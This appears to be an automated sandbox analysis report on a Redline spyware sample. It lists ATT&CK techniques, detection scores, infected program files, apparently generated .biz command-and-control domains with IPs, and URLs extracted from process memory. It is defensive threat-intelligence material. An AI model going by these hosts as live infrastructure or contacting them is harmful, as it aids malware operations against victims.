Domain Properties	Botnet	Replication Through Removable Media	2 Service Execution	RC Scripts	411 Process Injection	2 Software Packing	Cached Domain Credentials	221 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	1 Timestomp	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	2 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Proc Filesystem	141 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	332 Masquerading	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	141 Virtualization/Sandbox Evasion	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Access Token Manipulation	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	411 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
RJKUWSGxej.exe	71%	ReversingLabs	Win64.Spyware.Redline
RJKUWSGxej.exe	75%	Virustotal		Browse
RJKUWSGxej.exe	100%	Avira	TR/AD.Nekark.gizmc

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Check.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Check.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\Au3Info.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Reputation
76899.bodis.com	199.59.243.228	true	false	high
vjaxhpbji.biz	82.112.184.197	true	false	high
pywolwnvd.biz	54.244.188.177	true	false	high
s82.gocheapweb.com	51.195.88.199	true	true	unknown
ytctnunms.biz	3.94.10.34	true	false	high
lrxdmhrr.biz	54.244.188.177	true	false	high
vrrazpdh.biz	18.246.231.120	true	false	high
tbjrpv.biz	34.246.200.160	true	false	high
084725.parkingcrew.net	76.223.26.96	true	false	high
xlfhhhm.biz	47.129.31.212	true	false	high
warkcdu.biz	18.141.10.107	true	false	high
npukfztj.biz	44.221.84.105	true	false	high
sxmiywsfv.biz	13.251.16.150	true	false	high
przvgke.biz	72.52.178.23	true	false	high
dwrqljrr.biz	54.244.188.177	true	false	high
gytujflc.biz	208.117.43.225	true	false	high
gvijgjwkh.biz	3.94.10.34	true	false	high
gnqgo.biz	34.227.7.138	true	false	high
deoci.biz	34.227.7.138	true	false	high
iuzpxe.biz	13.251.16.150	true	false	high
nqwjmb.biz	35.164.78.200	true	false	high
wllvnzb.biz	18.141.10.107	true	false	high
cvgrf.biz	54.244.188.177	true	false	high
lpuegx.biz	82.112.184.197	true	false	high
bumxkqgxu.biz	44.221.84.105	true	false	high
yhqqc.biz	18.246.231.120	true	false	high
api.ipify.org	104.26.13.205	true	false	high
vcddkls.biz	18.141.10.107	true	false	high
vyome.biz	18.246.231.120	true	false	high
dlynankz.biz	85.214.228.140	true	false	high
gcedd.biz	13.251.16.150	true	false	high
oshhkdluh.biz	54.244.188.177	true	false	high
opowhhece.biz	34.227.7.138	true	false	high
jwkoeoqns.biz	34.227.7.138	true	false	high
jpskm.biz	18.246.231.120	true	false	high
ftxlah.biz	47.129.31.212	true	false	high
ifsaia.biz	13.251.16.150	true	false	high
oflybfv.biz	47.129.31.212	true	false	high
jhvzpcfg.biz	44.221.84.105	true	false	high
saytjshyf.biz	44.221.84.105	true	false	high
fwiwk.biz	72.52.178.23	true	false	high
typgfhb.biz	13.251.16.150	true	false	high
esuzf.biz	18.246.231.120	true	false	high
myups.biz	165.160.15.20	true	false	high
yauexmxk.biz	34.227.7.138	true	false	high
ssbzmoy.biz	18.141.10.107	true	false	high
knjghuig.biz	18.141.10.107	true	false	high
yunalwv.biz	208.117.43.225	true	false	high
brsua.biz	3.254.94.185	true	false	high
mgmsclkyu.biz	34.246.200.160	true	false	high
qaynky.biz	13.251.16.150	true	false	high
qpnczch.biz	18.246.231.120	true	false	high
mnjmhp.biz	47.129.31.212	true	false	high
acwjcqqv.biz	18.141.10.107	true	false	high
jdhhbs.biz	13.251.16.150	true	false	high
anpmnmxo.biz	unknown	unknown	false	high
ww7.przvgke.biz	unknown	unknown	true	unknown
zjbpaao.biz	unknown	unknown	false	high
uhxqin.biz	unknown	unknown	false	high
ww7.fwiwk.biz	unknown	unknown	true	unknown
zlenh.biz	unknown	unknown	false	high
ww12.przvgke.biz	unknown	unknown	true	unknown
lejtdj.biz	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://sxmiywsfv.biz/ramdicwprogd	false
http://vyome.biz/eqmwmfvyliwj	false
http://fwiwk.biz/yq	false
http://fwiwk.biz/tlrsmavbccvnwuep	false
http://oflybfv.biz/kkffexjgr	false
http://oflybfv.biz/afgoll	false
http://przvgke.biz/f	false
http://tbjrpv.biz/asieco	false
http://yunalwv.biz/ev	false
http://gcedd.biz/vl	false
http://gytujflc.biz/iphyiya	false
http://cvgrf.biz/crsx	false
http://knjghuig.biz/hspwddpejltixn	true
http://esuzf.biz/dwgeydrcwvx	false
http://lpuegx.biz/elhlcfwgsepqd	false
http://xlfhhhm.biz/ikqjeeswprlgw	false
http://vjaxhpbji.biz/jbavyixtd	false

URLs from Memory and Binaries

Name	Source	Malicious
http://44.221.84.105/yix	alg.exe, 00000007.00000003.2186311885.000000000059E000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id24LR	build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false
http://18.246.231.120:80/xvgc	alg.exe, 00000007.00000003.2368233473.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2356395367.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false
http://47.129.31.212:80/nmcegkesku	alg.exe, 00000007.00000003.2509390844.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2493652787.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false
http://ww12.przvgke.biz/qbfrwab?usid=25&utid=8703404410e	alg.exe, 00000007.00000003.1991584443.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1998989884.000000000059E000.00000004.00000020.00020000.00000000.sdmp	false
http://82.112.184.197/ea	alg.exe, 00000007.00000003.2060275574.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2060275574.00000000005BC000.00000004.00000020.00020000.00000000.sdmp	false
http://ww7.fwiwk.biz/P	alg.exe, 00000007.00000003.2222455804.000000000059E000.00000004.00000020.00020000.00000000.sdmp	false
http://3.94.10.34/Fv	alg.exe, 00000007.00000003.2529365991.00000000005E8000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id12Response	build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false
https://scss.adobesc.cominvalidAnnotIdList	alg.exe, 00000007.00000003.2286266911.0000000001470000.00000004.00001000.00020000.00000000.sdmp	false
http://165.160.15.20:80/qnyqrcsymndllasgPdCkw	alg.exe, 00000007.00000003.2319948901.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false
http://18.141.10.107/3	alg.exe, 00000007.00000003.2678116893.000000000059E000.00000004.00000020.00020000.00000000.sdmp	false
http://44.221.84.105/yyixK	alg.exe, 00000007.00000003.2186311885.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false
http://18.141.10.107/1	alg.exe, 00000007.00000003.2660841464.000000000059E000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id2Response	build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false
http://82.112.184.197/elhlcfwgsepqdUv	alg.exe, 00000007.00000003.2060275574.00000000005E7000.00000004.00000020.00020000.00000000.sdmp	false
http://18.246.231.120/	alg.exe, 00000007.00000003.2518175958.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2356395367.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2478183548.000000000059E000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id21Response	build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false
http://18.246.231.120/xvgc	alg.exe, 00000007.00000003.2356395367.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	false
http://54.244.188.177/crsxgudqu	alg.exe, 00000007.00000003.1965044071.000000000059E000.00000004.00000020.00020000.00000000.sdmp	false
http://18.141.10.107/9	alg.exe, 00000007.00000003.2015593495.000000000059E000.00000004.00000020.00020000.00000000.sdmp	false
http://ww7.fwiwk.biz/yq?usid=25&utid=8703410378G0aw(	alg.exe, 00000007.00000003.2222455804.000000000059E000.00000004.00000020.00020000.00000000.sdmp	false
https://scss.adobesc.comreasoncom.adobe.review.sdk	alg.exe, 00000007.00000003.2286318509.0000000001470000.00000004.00001000.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id13LR	build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false
http://ww7.fwiwk.biz:80/tlrsmavbccvnwuep?usid=25&utid=8703410598G	alg.exe, 00000007.00000003.2228650616.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false
http://72.52.178.23:80/f	alg.exe, 00000007.00000003.1999497913.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1998500791.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false
http://13.251.16.150/ramdicwprogdgs	alg.exe, 00000007.00000003.2467801954.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id5LR	build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false
https://nuget.org/nuget.exe	powershell.exe, 00000012.00000002.1988486571.00000000056CC000.00000004.00000800.00020000.00000000.sdmp	false
http://18.141.10.107/wkcytogysijgwirc	alg.exe, 00000007.00000003.2678116893.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2660841464.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false
http://13.251.16.150/pc	alg.exe, 00000007.00000003.2173196007.000000000059E000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id15Response	build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false
http://47.129.31.212/s	alg.exe, 00000007.00000003.2493652787.000000000059E000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	neworigin.exe, 0000000D.00000002.3160951501.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1970664669.0000000004661000.00000004.00000800.00020000.00000000.sdmp	false
http://54.244.188.177/rsx	alg.exe, 00000007.00000003.1971717430.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1965044071.000000000059E000.00000004.00000020.00020000.00000000.sdmp	false
http://18.246.231.120/eqmwmfvyliwj	alg.exe, 00000007.00000003.2426939526.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2434482436.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2493652787.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2509390844.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2451276373.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2426939526.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2518175958.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2478183548.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2467801954.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	false
http://44.221.84.105/	alg.exe, 00000007.00000003.2186311885.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1971717430.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2399070234.000000000059E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2179861854.000000000059E000.00000004.00000020.00020000.00000000.sdmp	false
http://ww7.fwiwk.biz:80/yq?usid=25&utid=8703410378	alg.exe, 00000007.00000003.2222455804.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false
https://api.ip.sb/ip	jsc.exe, 00000005.00000002.1896308865.0000000003840000.00000004.00000020.00020000.00000000.sdmp, build.exe, 0000000E.00000000.1892134419.0000000000C82000.00000002.00000001.01000000.00000009.sdmp	false
http://18.141.10.107:80/hspwddpejltixn	alg.exe, 00000007.00000003.2014386335.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2060275574.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false
http://54.244.188.177/s0	alg.exe, 00000007.00000003.2291591622.000000000059E000.00000004.00000020.00020000.00000000.sdmp	false
http://82.112.184.197/70	alg.exe, 00000007.00000003.2100203813.000000000059E000.00000004.00000020.00020000.00000000.sdmp	false
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000012.00000002.1970664669.00000000047B5000.00000004.00000800.00020000.00000000.sdmp	false
http://18.141.10.107/ckodyopddikmhbc	alg.exe, 00000007.00000003.2207970230.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2222455804.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000012.00000002.1970664669.00000000047B5000.00000004.00000800.00020000.00000000.sdmp	false
https://contoso.com/Icon	powershell.exe, 00000012.00000002.1988486571.00000000056CC000.00000004.00000800.00020000.00000000.sdmp	false
http://44.221.84.105:80/yqmsdjuyey	alg.exe, 00000007.00000003.2280774481.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false
http://35.164.78.200/yqpffwpvinojygwj	alg.exe, 00000007.00000003.2302197410.00000000005EC000.00000004.00000020.00020000.00000000.sdmp	false
http://82.112.184.197:80/elhlcfwgsepqd	alg.exe, 00000007.00000003.2060275574.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false
http://18.141.10.107/3S0	alg.exe, 00000007.00000003.2417407058.000000000059E000.00000004.00000020.00020000.00000000.sdmp	false
https://api.ipify.org/t	neworigin.exe, 0000000D.00000002.3160951501.0000000002F51000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id24Response	build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false
https://pcnatrk.net/track.	alg.exe, 00000007.00000003.1991584443.0000000000598000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1991735520.0000000001840000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Pester/Pester	powershell.exe, 00000012.00000002.1970664669.00000000047B5000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false
http://r11.i.lencr.org/0	neworigin.exe, 0000000D.00000002.3160951501.00000000030DD000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3179726785.00000000065B0000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3191203054.0000000009993000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3160951501.000000000307E000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3152915540.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3179935090.00000000065FC000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3191203054.000000000999A000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000D.00000002.3160951501.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp	false
http://54.244.188.177/tbbwyfgx	alg.exe, 00000007.00000003.2368233473.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id14LR	build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false
http://tempuri.org/Entity/Id6LR	build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2004/08/addressing	build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	false
http://ww12.przvgke.biz/qbfrwab?usid=25&utid=8703404410	alg.exe, 00000007.00000003.2060275574.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false
http://72.52.178.23:80/qbfrwabnbpwpuxhl	alg.exe, 00000007.00000003.1999497913.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1998500791.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.1991140646.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false
http://72.52.178.23:80/tlrsmavbccvnwuep	alg.exe, 00000007.00000003.2238967896.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2249290424.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2228650616.00000000005D1000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000012.00000002.1970664669.00000000047B5000.00000004.00000800.00020000.00000000.sdmp	false
